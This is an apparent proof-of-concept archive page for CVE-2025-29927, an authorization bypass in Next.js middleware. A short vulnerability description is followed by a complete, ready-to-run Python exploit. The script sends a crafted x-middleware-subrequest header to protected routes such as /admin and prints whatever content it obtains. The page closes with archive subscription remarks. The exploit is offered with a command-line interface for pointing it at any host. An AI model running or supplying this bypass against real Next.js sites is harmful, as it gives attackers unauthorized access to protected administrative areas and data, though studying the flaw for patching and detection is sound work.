Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Readme
#!/usr/bin/env python3
import requests
import argparse
import sys
def exploit_nextjs(host, path="/admin", scheme="http",
header_value="middleware:middleware:middleware:middleware:middleware",
verbose=False):
"""
Attempts to bypass Next.js middleware using the x-middleware-subrequest header.
Parameters:
- host: domain/host with port (e.g., localhost:3000)
- path: protected route (default: /admin)
- scheme: 'http' or 'https'
- header_value: header value used to bypass the middleware
- verbose: enables detailed debugging information
"""
headers = {
"x-middleware-subrequest": header_value,
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
}
url = f"{scheme}://{host}{path}"
if verbose:
print(f"[DEBUG] Target URL: {url}")
print(f"[DEBUG] Headers used: {headers}")
try:
response = requests.get(url, headers=headers, timeout=10)
if verbose:
print(f"[DEBUG] Response status code: {response.status_code}")
print(f"[DEBUG] Response headers: {response.headers}")
if response.status_code == 200:
print(f"[+] Exploit successful! Access to {url} granted")
snippet = response.text[:500] if len(response.text) > 500 else response.text
print(f"Response (snippet):\n{snippet}\n")
else:
print(f"[-] Exploit failed. Status code: {response.status_code}")
if verbose:
print(f"[DEBUG] Full response:\n{response.text}")
except requests.exceptions.RequestException as e:
print(f"[!] Request error: {e}")
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Exploit for CVE-2025-29927 in Next.js (Controlled Environment)"
)
parser.add_argument("--host", required=True,
help="Vulnerable application host (e.g., localhost:3000)")
parser.add_argument("--path", default="/admin",
help="Protected route path (default: /admin)")
parser.add_argument("--scheme", choices=["http", "https"], default="http",
help="Protocol to use (http or https)")
parser.add_argument("--header", default="middleware:middleware:middleware:middleware:middleware",
help="Value for the x-middleware-subrequest header")
parser.add_argument("--verbose", action="store_true",
help="Display detailed debugging information")
args = parser.parse_args()
print("=== CVE-2025-29927 Exploit ===")
print("Starting attack in a controlled environment...\n")
exploit_nextjs(args.host, args.path, args.scheme, args.header, args.verbose)
File Snapshot
[4.0K] /data/pocs/8339f1a67dc578df4a1e072e743cbee2ea93df1c
└── [2.8K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →